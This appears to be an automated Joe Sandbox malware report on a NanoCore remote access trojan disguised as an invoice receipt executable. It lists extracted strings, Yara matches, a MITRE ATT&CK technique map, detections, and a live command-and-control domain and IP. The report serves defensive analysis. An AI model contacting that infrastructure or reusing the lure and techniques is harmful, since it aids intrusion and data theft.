Source: chmac.exe, 0000000E.00000002.341227508.000000000273E000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: chmac.exe, 0000000F.00000002.344485087.0000000002540000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: chmac.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: chmac.exe, 00000010.00000002.359331974.00000000024B0000.00000004.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: chmac.exe, 00000010.00000000.339547057.0000000000414000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: chmac.exe, 00000010.00000002.359590843.00000000038E1000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: chmac.exe, 00000010.00000002.359549562.00000000028EE000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: chmac.exe, 00000010.00000002.359549562.00000000028EE000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: chmac.exe, 00000010.00000002.358899493.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: chmac.exe, 00000010.00000002.359622615.000000000391A000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: chmac.exe, 00000010.00000002.359622615.000000000391A000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: chmac.exe, 00000010.00000002.359413916.0000000002502000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 14.2.chmac.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.415058.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.38e3258.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.415058.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.415058.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.415058.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.4830000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.1.chmac.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.37b0e54.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.658288.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.24b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.415058.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.50a9b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.658288.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.1.chmac.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.chmac.exe.3011458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.1.chmac.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.415058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.1.chmac.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.1.chmac.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.chmac.exe.3000000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.415058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.chmac.exe.2540000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.chmac.exe.2551458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.37ac01e.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.chmac.exe.3011458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.37b547d.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.3960e54.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.3733258.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.chmac.exe.3000000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.50a9b8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.3960e54.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.2260000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.2260000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.24b0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.415058.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.chmac.exe.2551458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.415058.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.395c01e.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.37b0e54.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.3733258.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.415058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.415058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.396547d.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.38e3258.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.1.chmac.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.415058.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.chmac.exe.2540000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.341257135.0000000003731000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.322700795.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.323810648.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.359331974.00000000024B0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.327158537.0000000003000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.358998677.0000000000644000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.341406619.0000000004832000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.341081024.0000000002260000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.339547057.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.344485087.0000000002540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.340666322.00000000004F4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.359590843.00000000038E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.341018876.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.297135620.00000000030A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.340553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.358899493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.359622615.000000000391A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.341299575.000000000376A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.293187290.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.294042312.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.359413916.0000000002502000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 6964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 7092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chmac.exe PID: 6288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chmac.exe PID: 6556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chmac.exe PID: 6760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chmac.exe PID: 6820, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Registry Run Keys / Startup Folder1	Process Injection111	Disable or Modify Tools1	Input Capture21	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder1	Deobfuscate/Decode Files or Information11	LSASS Memory	File and Directory Discovery2	Remote Desktop Protocol	Input Capture21	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	System Information Discovery15	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing21	NTDS	Security Software Discovery12	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Process Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol21	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion21	Cached Domain Credentials	Virtualization/Sandbox Evasion21	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection111	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\dihsw\chmac.exe	42%	ReversingLabs	Win32.Backdoor.NanoBot

Unpacked PE Files

Source	Detection	Scanner	Label	Download
16.0.chmac.exe.400000.2.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
16.0.chmac.exe.400000.5.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
14.0.chmac.exe.400000.4.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
14.2.chmac.exe.4830000.9.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
14.0.chmac.exe.400000.2.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.1.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.5.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
14.2.chmac.exe.400000.1.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30f0000.6.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
16.0.chmac.exe.400000.1.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
14.1.chmac.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.6.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
14.0.chmac.exe.400000.3.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.8.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.4.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
14.0.chmac.exe.400000.5.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
3.1.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
16.2.chmac.exe.2500000.4.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.3.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
14.0.chmac.exe.400000.6.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
16.1.chmac.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
16.0.chmac.exe.400000.4.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
16.2.chmac.exe.400000.1.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.2.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
14.0.chmac.exe.400000.1.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
16.0.chmac.exe.400000.8.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
16.0.chmac.exe.400000.6.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
14.0.chmac.exe.400000.8.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
16.0.chmac.exe.400000.3.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File

Domains

Source	Detection	Scanner	Label	Link
boyhome5100.duckdns.org	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
boyhome5100.duckdns.org	2%	Virustotal		Browse
boyhome5100.duckdns.org	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
boyhome5100.duckdns.org	194.5.98.28	true	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
boyhome5100.duckdns.org	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_Error	chmac.exe, chmac.exe, 0000000F.00000000.324531335.0000000000409000.00000008.00020000.sdmp, chmac.exe, 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp, chmac.exe, 00000010.00000000.330014937.0000000000409000.00000008.00020000.sdmp, G2M8C76V_INV0ICE_RECEIPT.exe, chmac.exe.0.dr	false		high
http://nsis.sf.net/NSIS_ErrorError	G2M8C76V_INV0ICE_RECEIPT.exe, chmac.exe.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.98.28	boyhome5100.duckdns.org	Netherlands		208476	DANILENKODE	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	552628
Start date:	13.01.2022
Start time:	15:31:20
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	G2M8C76V_INV0ICE_RECEIPT.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@9/12@19/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 70.6% (good quality ratio 65.6%) Quality average: 78.3% Quality standard deviation: 30.4%
HCA Information:	Successful, ratio: 88% Number of executed functions: 224 Number of non-executed functions: 120
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
